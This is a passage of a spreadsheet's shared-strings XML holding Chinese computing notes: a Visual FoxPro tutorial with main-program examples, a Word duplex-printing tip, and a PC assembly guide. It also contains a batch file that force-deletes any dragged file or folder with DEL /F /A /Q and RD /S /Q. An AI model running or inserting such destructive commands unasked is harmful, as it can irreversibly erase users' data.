    <t xml:space="preserve">    事件过程(Event Procudure)是为处理特定事件而编写的一段程序。当事件由用户触发(如C1ick)或由系统触发(如Load)时，对象就会对该事件作出响应(Respond)。响应某个事件后所执行的程序代码就是事件过程。</t>
  </si>
  <si>
    <t xml:space="preserve">    </t>
  </si>
  <si>
    <t>3．对象的方法</t>
  </si>
  <si>
    <t xml:space="preserve">    方法(Method)是与对象相关联的过程，但又不同于一般的Visual FoxPro过程。方法程序紧密地和对象连接在一起，并且与一般Visual FoxPro过程的调用方式也有所不同。</t>
  </si>
  <si>
    <t xml:space="preserve">    与事件过程类似，VFP的方法属于对象的内部函数，只是方法用于完成某种特定的功能而不一定响应某一事件，如添加对象(Addobject)方法、绘制矩形(Box)方法、释放表单(Release)方法等。方法也被“封装”在对象中，不同的对象具有不同的内部方法。VFP提供了百余个内部方法供不同的对象调用。与事件过程不同的是，根据需要可由用户自行建立新方法。</t>
  </si>
  <si>
    <t>4．事件与方法的程序调用</t>
  </si>
  <si>
    <t xml:space="preserve">    事件过程由事件的激发而调用其代码，也可以在运行中由程序调用其代码，而方法的代码只能在运行中由程序调用。</t>
  </si>
  <si>
    <t>在程序中调用事件代码的格式是:</t>
  </si>
  <si>
    <t>表单名.对象名.事件名</t>
  </si>
  <si>
    <t>在程序中调用对象方法的格式是</t>
  </si>
  <si>
    <t>[[&lt;变量名&gt;]＝]表单名.对象名.方法名</t>
  </si>
  <si>
    <t>以下数据类型只能被用于数据表中的字段：</t>
  </si>
  <si>
    <t>1.初始化环境</t>
  </si>
  <si>
    <t>从当前环境截取环境设置命令的方法:</t>
  </si>
  <si>
    <t>(1)从工具菜单中选择"选项",按下Shift键同时选择"确定",则可以在"命令"窗口中显示环境的SET命令.</t>
  </si>
  <si>
    <t>(2)从"命令"窗口中,将命令复制和粘贴到程序中.除了环境以外,在应用程序中通常还需要编写程序代码执行初始化变量,建立默认的路径,打开需要的数据库,表及索引等功能.</t>
  </si>
  <si>
    <t>2.显示初始的用户界面</t>
  </si>
  <si>
    <t>3.控制事件循环</t>
  </si>
  <si>
    <t>控制事件循环的方法是执行READ EVENTS命令.在启动了事件循环之后,应用程序将处在所有最后显示的用户界面元素的控制之下,否则应用程序运行后可能显示片刻然后退出.</t>
  </si>
  <si>
    <t>需要注意的是,在启动事件循环之前建立一个方法退出事件循环.</t>
  </si>
  <si>
    <t>4.组织主程序文件</t>
  </si>
  <si>
    <t>以下是一个简单的主程序:</t>
  </si>
  <si>
    <t>SET DEFAULT TO D:\学生</t>
  </si>
  <si>
    <t>SET SAFE OFF</t>
  </si>
  <si>
    <t>SET CENTURY ON</t>
  </si>
  <si>
    <t>CLEAR WINDOWS</t>
  </si>
  <si>
    <t>CLEAR ALL</t>
  </si>
  <si>
    <t>OPEN DATABASE 学生档案 EXCLUSIVE</t>
  </si>
  <si>
    <t>USE 学生</t>
  </si>
  <si>
    <t>DO FORM 启动画画.scx</t>
  </si>
  <si>
    <t>READ EVENTS</t>
  </si>
  <si>
    <t>SET SYSMENU TO DEFA</t>
  </si>
  <si>
    <t>SET SAFE ON</t>
  </si>
  <si>
    <t>SET CENTURY OFF</t>
  </si>
  <si>
    <t>CLOSE ALL</t>
  </si>
  <si>
    <t>*-------------------main.prg</t>
  </si>
  <si>
    <t>set help to comp_help.chm  *设定帮助文件</t>
  </si>
  <si>
    <t>set cons on       *激活从程序中向 Visual FoxPro 主窗口或活动的用户自定义窗口的输出。</t>
  </si>
  <si>
    <t>set date ansi     *设置日期格式</t>
  </si>
  <si>
    <t>set score off     *设定Num Lock、 Caps Lock 和 Insert 键状态</t>
  </si>
  <si>
    <t>set safe off      *关闭对话框</t>
  </si>
  <si>
    <t>set stat bar on   *打开状态栏</t>
  </si>
  <si>
    <t>set cent on       *设定日期格式年为4位数</t>
  </si>
  <si>
    <t>set color to      *设定配色方案</t>
  </si>
  <si>
    <t>set sysmenu off   *关闭系统主菜单</t>
  </si>
  <si>
    <t>clea              *刷新屏幕</t>
  </si>
  <si>
    <t>clear all         *清理变量</t>
  </si>
  <si>
    <t>ON ERROR DO err.PRG  *设定出错处理程序</t>
  </si>
  <si>
    <t>on shutdown do qUIT1.prg *指定当试图退出FoxPro时，要执行的命令，否则提示不能退出FoxPro</t>
  </si>
  <si>
    <t>with _screen      *设定FoxPro主窗口属性</t>
  </si>
  <si>
    <t>.visible=.f.      *设定主窗口不可见</t>
  </si>
  <si>
    <t>endwith</t>
  </si>
  <si>
    <t>do form begin     *执行启动画面（包括版权、版本、使用者等）</t>
  </si>
  <si>
    <t>read event        *占用进程，启动事件处理</t>
  </si>
  <si>
    <t>do form login     *执行登录表单，对用户进行身份验证</t>
  </si>
  <si>
    <t>read event        *占用进程</t>
  </si>
  <si>
    <t>with _screen      *对主窗口进行再次设定</t>
  </si>
  <si>
    <t>.visible=.t.</t>
  </si>
  <si>
    <t>.closable=.t.</t>
  </si>
  <si>
    <t>.controlbox=.t.</t>
  </si>
  <si>
    <t>.maxbutton=.t.</t>
  </si>
  <si>
    <t>.minbutton=.t.</t>
  </si>
  <si>
    <t>.movable=.t.</t>
  </si>
  <si>
    <t>.top=0</t>
  </si>
  <si>
    <t>.left=0</t>
  </si>
  <si>
    <t>.windowstate=2    *将主窗口最大化</t>
  </si>
  <si>
    <t>.caption='中国建设银行计算机台帐管理'</t>
  </si>
  <si>
    <t>.icon='screen2.ico'  *设定图标</t>
  </si>
  <si>
    <t>VF主程序设计</t>
  </si>
  <si>
    <t>VF主程序设计</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>编程所设初始环境的设置,供参考.</t>
  </si>
  <si>
    <t>clea all</t>
  </si>
  <si>
    <t>close all</t>
  </si>
  <si>
    <t>SET TALK OFF</t>
  </si>
  <si>
    <t>set hours to 24</t>
  </si>
  <si>
    <t>SET DATE TO ANSI</t>
  </si>
  <si>
    <t>SET ESCAPE OFF</t>
  </si>
  <si>
    <t>SET DELETED ON</t>
  </si>
  <si>
    <t>set status off</t>
  </si>
  <si>
    <t>set safe off</t>
  </si>
  <si>
    <t>set optimize on</t>
  </si>
  <si>
    <t>set status bar off</t>
  </si>
  <si>
    <t>SET UNIQUE ON</t>
  </si>
  <si>
    <t>_SCREEN.CAPTION = '学生收费管理系统'</t>
  </si>
  <si>
    <t>_screen.fontname='楷体'</t>
  </si>
  <si>
    <t>_SCREEN.AUTOCENTER = .T.</t>
  </si>
  <si>
    <t>_SCREEN.CLOSABLE = .t.</t>
  </si>
  <si>
    <t>_SCREEN.WINDOWSTATE = 2</t>
  </si>
  <si>
    <t>_SCREEN.SHOW</t>
  </si>
  <si>
    <t>_SCREEN.ICON = 'note14.ico'</t>
  </si>
  <si>
    <t>_SCREEN.picture = 'win.jpg'</t>
  </si>
  <si>
    <t>下面是一个主程序的例子:</t>
  </si>
  <si>
    <t>&amp;&amp;&amp;环境设置*******************************************</t>
  </si>
  <si>
    <t>set safety on   &amp;&amp; don't ask before overwrite files</t>
  </si>
  <si>
    <t>set talk off</t>
  </si>
  <si>
    <t>set exact on&amp;&amp;严格比较</t>
  </si>
  <si>
    <t>set deleted on &amp;&amp;忽略被删除的记录</t>
  </si>
  <si>
    <t>set date YMD&amp;&amp;年月日格式显示日期</t>
  </si>
  <si>
    <t>set cent on &amp;&amp;日期显示世纪</t>
  </si>
  <si>
    <t>&amp;&amp;&amp;主窗口设置*****************************************</t>
  </si>
  <si>
    <t>_screen.picture="prg.mrp\xs\resource\south1.jpg"</t>
  </si>
  <si>
    <t>_screen.caption="销售管理子系统"</t>
  </si>
  <si>
    <t>_screen.windowstate=2</t>
  </si>
  <si>
    <t>set sysmenu to&amp;&amp;关闭系统菜单设置</t>
  </si>
  <si>
    <t>&amp;&amp;&amp;公共变量定义***************************************</t>
  </si>
  <si>
    <t>public xs_gdRR,;&amp;&amp;当前操作日期</t>
  </si>
  <si>
    <t>xs_gdRR=date()</t>
  </si>
  <si>
    <t>do form welcome&amp;&amp;欢迎表单</t>
  </si>
  <si>
    <t>WAIT "" TIMEOUT  0.5</t>
  </si>
  <si>
    <t>do form XSenter to xs_plenter&amp;&amp;密码检验</t>
  </si>
  <si>
    <t>if xs_plenter</t>
  </si>
  <si>
    <t>   do XS.MPR &amp;&amp;调用菜单</t>
  </si>
  <si>
    <t>   on shutdown do tuichu.prg</t>
  </si>
  <si>
    <t>   read events</t>
  </si>
  <si>
    <t>endif</t>
  </si>
  <si>
    <t>在菜单的退出系统项中加"clear events"退出</t>
  </si>
  <si>
    <t>实现WORD双面打印的简便方法</t>
  </si>
  <si>
    <t>   </t>
  </si>
  <si>
    <t>建议采用以下具体操作方法：</t>
  </si>
  <si>
    <t>1.保证所打印的word文档的总页数为偶数页；如为奇数，可在最后加上一空白页。</t>
  </si>
  <si>
    <t>3.将全部打印纸翻过来放在打印机纸盒中，重复上面步骤，选“偶数页”，点旁边的“选项”，出现另外对话框，点选“逆页续打印”，“确定”后，开始打印。</t>
  </si>
  <si>
    <t>新建 文本文档 写入下列命令：</t>
  </si>
  <si>
    <t>DEL /F /A /Q \\?\%1</t>
  </si>
  <si>
    <t>RD /S /Q \\?\%1</t>
  </si>
  <si>
    <t>另存为 统统删除.bat</t>
  </si>
  <si>
    <t>然后，把要删除的文件或者目录拖放到这个bat文件的图标上就可以删除了。</t>
  </si>
  <si>
    <t>无敌删除命令</t>
  </si>
  <si>
    <t>一、装机前的准备工作</t>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、工具准备　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>常言道“工欲善其事，必先利其器”，没有顺手的工具，装机也会变得麻烦起来，那么哪些工具是装机之前需要准备的呢？（如图，从左至右为“尖嘴钳、散热膏、十字解刀、平口解刀”）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">  </t>
  </si>
  <si>
    <t>①十字解刀：十字解刀又称螺丝刀、螺丝起子或改锥，用于拆卸和安装螺钉的工具。由于计算机上的螺钉全部都是十字形的，所以你只要准备一把十字螺丝刀就可以了。那么为什么要准备磁性的螺丝刀呢？这是因为计算机器件按装后空隙较小，一旦螺钉掉落在其中想取出来就很麻烦了。另外，磁性螺丝刀还可以吸住螺钉，在安装时非常方便，因此计算机用螺丝刀多数都具有永磁性的。　　</t>
  </si>
  <si>
    <t>②平口解刀：平口解刀又称一字型解刀。如何需要你也可准备一把平口解刀，不仅可方便安装，而且可用来拆开产品包装盒、包装封条等。</t>
  </si>
  <si>
    <t>③镊子：你还应准备一把大号的医用镊子，它可以用来夹取螺钉、跳线帽及其它的一些小零碎动西。　　</t>
  </si>
  <si>
    <t>④钳子：钳子在安装电脑时用处不是很大，但对于一些质量较差的机箱来讲，钳子也会派上用场。它可以用来拆断机箱后面的挡板。这些挡板按理应用手来回折几次就会断裂脱落，但如果机箱钢板的材质太硬，那就需要钳子来帮忙了。　　</t>
  </si>
  <si>
    <t>建议：最好准备一把尖嘴钳，它可夹可钳，这样还可省却镊子。　　</t>
  </si>
  <si>
    <r>
      <t>⑤散热膏：在安装高频率</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>时散热膏（硅脂）必不可少，大家可购买优质散热膏（硅脂）备用。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、材料准备　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>①准备好装机所用的配件：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、主板、内存、显卡、硬盘、软驱、光驱、机箱电源、键盘鼠标、显示器、各种数据线</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源线等。</t>
    </r>
  </si>
  <si>
    <t>②电源排型插座：由于计算机系统不只一个设备需要供电，所以一定要准备万用多孔型插座一个，以方便测试机器时使用。　　</t>
  </si>
  <si>
    <t>③器皿：计算机在安装和拆卸的过程中有许多螺丝钉及一些小零件需要随时取用，所以应该准备一个小器皿，用来盛装这些动西，以防止丢失。　　</t>
  </si>
  <si>
    <t>④工作台：为了方便进行安装，你应该有一个高度适中的工作台，无论是专用的电脑桌还是普通的桌子，只要能够满足你的使用需求就可以了。　</t>
  </si>
  <si>
    <t xml:space="preserve"> </t>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、装机过程中的注意事项　　</t>
    </r>
  </si>
  <si>
    <t>①防止静电：由于我们穿着的衣物会相互摩擦，很容易产生静电，而这些静电则可能将集成电路内部击穿造成设备损坏，这是非常危险的。</t>
  </si>
  <si>
    <t>②防止液体进入计算机内部：在安装计算机元器件时，也要严禁液体进入计算机内部的板卡上。因为这些液体都可能造成短路而使器件损坏，所以要注意不要将你喝的饮料摆放在机器附近，对于爱出汗的朋友来说，也要避免头上的汗水滴落，还要注意不要让手心的汗沾湿板卡。　　</t>
  </si>
  <si>
    <t>③使用正常的安装方法，不可粗暴安装：在安装的过程中一定要注意正确的安装方法，对于不懂不会的地方要仔细查阅说明书，不要强行安装，稍微用力不当就可能使引脚折断或变形。对于安装后位置不到位的设备不要强行使用螺丝钉固定，因为这样容易使板卡变形，日后易发生断裂或接触不良的情况。　　</t>
  </si>
  <si>
    <t>④把所有零件从盒子里拿出来（不过还不要从防静电袋子中拿出来），按照安装顺序排好，看看说明书，有没有特殊的安装需求。准备工作做得越好，接下来的工作就会越轻松。　　</t>
  </si>
  <si>
    <r>
      <t>⑤以主板为中心，把所有东西排好。在主板装进机箱前，先装上处理器与内存；要不然过后会很难装，搞不好还会伤到主板。此外在装</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>PCI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卡时，要确定其安装牢不牢固，因为很多时候，你上螺丝时，卡会跟着翘起来。如果撞到机箱，松脱的卡会造成运作不正常，甚至损坏。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>⑥测试前，建议你只装必要的组件——主板、处理器、散热片与风扇、硬盘、一台光驱、以及显卡。其它东西如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DVD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、声卡、网卡等等，再确定没问题的时候再装。此外第一次安装好后把机箱关上，但不要锁上螺丝，因为如果哪儿没装好你还会开开关关好几次。</t>
    </r>
  </si>
  <si>
    <r>
      <t>二、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>及</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇的安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>1.CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的安装　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大家在将主板装进机箱前最好先将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和内存安装好，以免将主板安装好后机箱内狭窄的空间影响</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等的顺利安装。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，稍向外</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>向上用力拉开</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插座上的锁杆与插座呈</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度角，以便让</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>能够插入处理器插座。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第二步，然后将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上针脚有缺针的部位对准插座上的缺口。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第三步，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>只能够在方向正确时才能够被插入插座中，然后按下锁杆。（安装好后的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
  </si>
  <si>
    <r>
      <t>第四步，在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的核心上均匀涂上足够的散热膏（硅脂）。但要注意不要涂得太多，只要均匀的涂上薄薄一层即可。</t>
    </r>
  </si>
  <si>
    <r>
      <t>提示：一定要在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上涂散热膏或加块散热垫。这有助于将废热由处理器传导至散热装置上。没有在处理器上使用导热介质会导致当机甚至烧毁</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>！此外，无论散热装置的接触面有任何细微的偏差，甚或只是一小点的灰尘，都会导致无法有效的将废热从处理器传导出来。散热膏同时在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的接触面上（就是印模）也充满了极微小的散热孔道。一些散热装置的制造商会在其产品中附有散热膏，如果你的没有，在大多数计算机或电子零件商店都会有卖，价格大约</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>元。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2.CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇的安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的安装一般很简单，但</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇的安装较复杂，其步骤如下：　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，首先在主板上找到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>和它的支撑机构的位置，然后安装好</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。　　</t>
    </r>
  </si>
  <si>
    <t>第二步，接着将散热片妥善定位在支撑机构上；　　</t>
  </si>
  <si>
    <t>第三步，再将散热风扇安装在散热片的顶部——向下压风扇直到它的四个卡子鍥入支撑机构对应的孔中；　</t>
  </si>
  <si>
    <t>第四步，再将两个压杆压下以固定风扇，需要注意的是每个压杆都只能沿一个方向压下；</t>
  </si>
  <si>
    <r>
      <t>第五步，最后一步，最后将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇的电源线接到主板上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>针的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>风扇电源接头上即可。</t>
    </r>
  </si>
  <si>
    <t>小知识：</t>
  </si>
  <si>
    <r>
      <t>跳线与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关——现在几乎所有主板都是自动识别</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以及设置电压的，但为了以防万一，最好在安装前先阅读主板说明书，看相关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装的细节，确定是否需要进行跳线设置。跳线其实就是一个开关，它通过跳线帽来控制开关的闭合，从而达到主板以些部件功能的通断及一些特殊功能的实现（跳线和跳线说明文字）。跳线主要是用来设定硬件的工作状态，譬如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的内核电压、“外频”和“倍频”，主板的资源分配以及启用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭某些主板功能等。跳线赋予了主板更为灵活地设置方式，使用户能够随心所欲地对主板上各部件的工作方式进行设置。但是随着大量硬件参数设置在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中得以完成，主板上的跳线已经较</t>
    </r>
    <r>
      <rPr>
